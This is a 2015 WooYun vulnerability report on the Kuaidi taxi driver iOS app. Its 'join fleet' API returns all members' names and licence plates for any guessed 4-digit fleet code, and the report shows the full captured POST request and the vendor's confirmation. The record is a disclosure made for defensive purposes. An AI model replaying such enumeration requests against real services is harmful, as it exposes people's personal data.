当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0145246

漏洞标题:快的打车某重要系统逻辑漏洞可泄漏大量用户敏感信息包括姓名/车牌号等

相关厂商:快的打车

漏洞作者: Martial

提交时间:2015-10-07 23:04

修复时间:2015-11-23 19:50

公开时间:2015-11-23 19:50

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-07: 细节已通知厂商并且等待厂商处理中
2015-10-09: 厂商已经确认,细节仅向厂商公开
2015-10-19: 细节向核心白帽子及相关领域专家公开
2015-10-29: 细节向普通白帽子公开
2015-11-08: 细节向实习白帽子公开
2015-11-23: 细节向公众公开

简要描述:

大量用户敏感信息包括姓名/车牌号等

详细说明:

问题出在 APP端
我测试的是快的司机IOS版
首先我注册了一个司机帐号
然后登录后 发现有个车队的功能
点击车队-加入车队
输入4位车队号
我随手输入了1111
然后抓包 

POST /taxi/d/js.do?os=ios&osver=9.0&ver=4.0&lat=40.020826&lng=116.536539&city=110105&ts=1444229236532&idx=2934478&token=cb2d6fd999485732b1ce0d7c2f319150&ccode=86&cmd=60006&sign=9c33497682fb3e5c4096ac1cadaa84d4084fad08bbf63d482308 HTTP/1.1
Host: c2.kuaidadi.com:80
Content-Type: application/json
Connection: keep-alive
Proxy-Connection: keep-alive
Accept: */*
User-Agent: TaxiDriver/4.0 (iPhone; iOS 9.0; Scale/2.00)
Accept-Language: zh-Hans-CN;q=1
Accept-Encoding: gzip, deflate
Content-Length: 59
{"cmd":60006,"request":{"did":"a1a0Ln6L","channel":"1111"}}


看下返回值
发现把所有成员的信息返回了

1.jpg


在测试几个看看
测试车队号1234
看下返回值

2.jpg


我就不把所有的跑出来了

漏洞证明:

1.jpg


2.jpg

修复方案:

修改相关逻辑问题

版权声明:转载请注明来源 Martial@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-10-09 19:48

厂商回复:

感谢提交,鉴于使用该功能受影响的司机只占司机总数的很小一部分,给12rank。

最新状态:

暂无